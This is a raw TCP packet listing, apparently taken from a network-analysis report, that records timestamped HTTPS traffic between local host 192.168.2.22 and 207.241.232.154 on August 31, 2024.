                                                      Aug 31, 2024 15:51:20.287349939 CEST49171443192.168.2.22207.241.232.154
                                                      Aug 31, 2024 15:51:20.287360907 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.287385941 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.287410021 CEST49171443192.168.2.22207.241.232.154
                                                      Aug 31, 2024 15:51:20.287554026 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.287605047 CEST49171443192.168.2.22207.241.232.154
                                                      Aug 31, 2024 15:51:20.287610054 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.287630081 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.287659883 CEST49171443192.168.2.22207.241.232.154
                                                      Aug 31, 2024 15:51:20.312743902 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.312814951 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.312827110 CEST49171443192.168.2.22207.241.232.154
                                                      Aug 31, 2024 15:51:20.312838078 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.312866926 CEST49171443192.168.2.22207.241.232.154
                                                      Aug 31, 2024 15:51:20.318155050 CEST49171443192.168.2.22207.241.232.154
                                                      Aug 31, 2024 15:51:20.340703011 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.340771914 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.340774059 CEST49171443192.168.2.22207.241.232.154
                                                      Aug 31, 2024 15:51:20.340799093 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.340826035 CEST49171443192.168.2.22207.241.232.154
                                                      Aug 31, 2024 15:51:20.341224909 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.341274023 CEST49171443192.168.2.22207.241.232.154
                                                      Aug 31, 2024 15:51:20.341281891 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.341305971 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.341352940 CEST49171443192.168.2.22207.241.232.154
                                                      Aug 31, 2024 15:51:20.341360092 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.341648102 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.341700077 CEST49171443192.168.2.22207.241.232.154
                                                      Aug 31, 2024 15:51:20.341708899 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.341722012 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.341773033 CEST49171443192.168.2.22207.241.232.154
                                                      Aug 31, 2024 15:51:20.341778994 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.342149973 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.342202902 CEST49171443192.168.2.22207.241.232.154
                                                      Aug 31, 2024 15:51:20.342219114 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.342246056 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.342272043 CEST49171443192.168.2.22207.241.232.154
                                                      Aug 31, 2024 15:51:20.345961094 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.346019030 CEST49171443192.168.2.22207.241.232.154
                                                      Aug 31, 2024 15:51:20.346024036 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.346050024 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.346076012 CEST49171443192.168.2.22207.241.232.154
                                                      Aug 31, 2024 15:51:20.364542961 CEST49171443192.168.2.22207.241.232.154
                                                      Aug 31, 2024 15:51:20.379642010 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.379719973 CEST49171443192.168.2.22207.241.232.154
                                                      Aug 31, 2024 15:51:20.379724026 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.379755020 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.379785061 CEST49171443192.168.2.22207.241.232.154
                                                      Aug 31, 2024 15:51:20.379873991 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.379914999 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.379923105 CEST49171443192.168.2.22207.241.232.154
                                                      Aug 31, 2024 15:51:20.379936934 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.379965067 CEST49171443192.168.2.22207.241.232.154
                                                      Aug 31, 2024 15:51:20.405051947 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.405077934 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.405116081 CEST49171443192.168.2.22207.241.232.154
                                                      Aug 31, 2024 15:51:20.405137062 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.405145884 CEST49171443192.168.2.22207.241.232.154
                                                      Aug 31, 2024 15:51:20.414859056 CEST49171443192.168.2.22207.241.232.154
                                                      Aug 31, 2024 15:51:20.433284044 CEST44349171207.241.232.154192.168.2.22
                                                      Aug 31, 2024 15:51:20.433355093 CEST49171443192.168.2.22207.241.232.154
                                                      Aug 31, 2024 15:51:20.433367014 CEST44349171207.241.232.154192.168.2.22
Timestamp                             Src Port  Dst Port  Source IP        Dest IP
Aug 31, 2024 15:51:20.433396101 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.433428049 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.433562040 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.433604002 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.433614016 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.433640003 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.433691978 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.433697939 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.433816910 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.433866024 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.433876038 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.433890104 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.433939934 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.433947086 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.434205055 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.434254885 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.434263945 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.434283972 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.434339046 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.434345007 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.434480906 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.434530020 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.434536934 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.434551001 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.434598923 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.434606075 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.471890926 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.471929073 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.471987963 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.472013950 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.472032070 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.472035885 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.472062111 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.472074986 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.472083092 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.472098112 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.472105980 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.497529030 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.497570038 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.497612000 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.497632980 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.497643948 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.504832983 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.525688887 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.525783062 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.525789976 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.525820017 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.525841951 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.526052952 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.526098013 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.526110888 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.526140928 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.526190042 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.526197910 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.526352882 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.526402950 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.526417017 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.526432991 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.526484013 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.526492119 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.526715040 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.526766062 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.526773930 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.526794910 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.526845932 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.526854038 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.527086973 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.527139902 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.527148962 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.527182102 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.527205944 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.569941044 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.570071936 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.570089102 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.570121050 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.570178986 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.570188999 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.570272923 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.570324898 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.570333958 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.570360899 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.570415020 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.570421934 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.589114904 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.589939117 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.589975119 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.590029955 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.590039968 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.590050936 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.617984056 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.618019104 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.618072033 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.618089914 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.618091106 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.618103027 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.618136883 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.618154049 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.618208885 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.618222952 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.618562937 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.618588924 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.618608952 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.618618011 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.618629932 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.618985891 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.619007111 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.619034052 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.619041920 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.619064093 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.619477034 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.619504929 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.619524002 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.619532108 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.619553089 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.656667948 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.656704903 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.656771898 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.656771898 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.656791925 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.656887054 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.656913996 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.656933069 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.656940937 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.656951904 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.656963110 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.682229996 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.682260036 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.682327986 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.682357073 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.710781097 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.710817099 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.710849047 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.710870028 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.710886955 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.710891008 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.710917950 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.710937977 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.710944891 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.710956097 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.711087942 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.711113930 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.711143017 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.711148977 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.711158991 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.711430073 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.711452007 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.711499929 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.711507082 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.711529970 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.711777925 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.711955070 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.711977005 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.712001085 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.712007046 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.712017059 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.712038040 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.713573933 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.749327898 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.749360085 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.749394894 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.749413013 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.749423981 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.749424934 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.749456882 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.749470949 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.749478102 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.749501944 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.750508070 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.775211096 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.775249004 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.775284052 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.775305986 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.775320053 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.777726889 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.804625988 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.804661989 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.804702044 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.804732084 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.804748058 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.804913044 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.805166960 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.805193901 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.805212975 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.805223942 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.805243015 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.805495977 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.805516005 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.805537939 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.805547953 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.805557013 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.805912018 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.805936098 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.805954933 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.805963993 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.805975914 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.806240082 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.806267023 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.806282997 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.806291103 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.806308031 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.811620951 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.841618061 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.841651917 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.841686964 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.841722012 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.841739893 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.841965914 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.841999054 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.842006922 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.842015028 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.842037916 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.846082926 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.868025064 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.868057966 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.868123055 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.868155003 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.868171930 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.884284973 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.896958113 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.896990061 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.897105932 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.897149086 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.897507906 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.897535086 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.897555113 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.897562981 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.897577047 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.897583961 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.898060083 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.898082018 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.898106098 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.898114920 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.898123980 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.898345947 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.898371935 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.898386002 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.898391962 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.898411989 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.898792982 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.898813963 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.898835897 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.898843050 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.898854017 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.919302940 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.934185028 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.934216976 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.934273005 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.934303045 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.934315920 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.934428930 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.934456110 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.934478045 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.934485912 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.934504986 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.936302900 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.961466074 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.961536884 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.961554050 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.961582899 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.961606026 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.963067055 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.989641905 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.989684105 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.989721060 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.989748955 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.989764929 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.990066051 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.990087032 CEST  443       49171     207.241.232.154  192.168.2.22
Aug 31, 2024 15:51:20.990108967 CEST  49171     443       192.168.2.22     207.241.232.154
Aug 31, 2024 15:51:20.990118027 CEST  443       49171     207.241.232.154  192.168.2.22
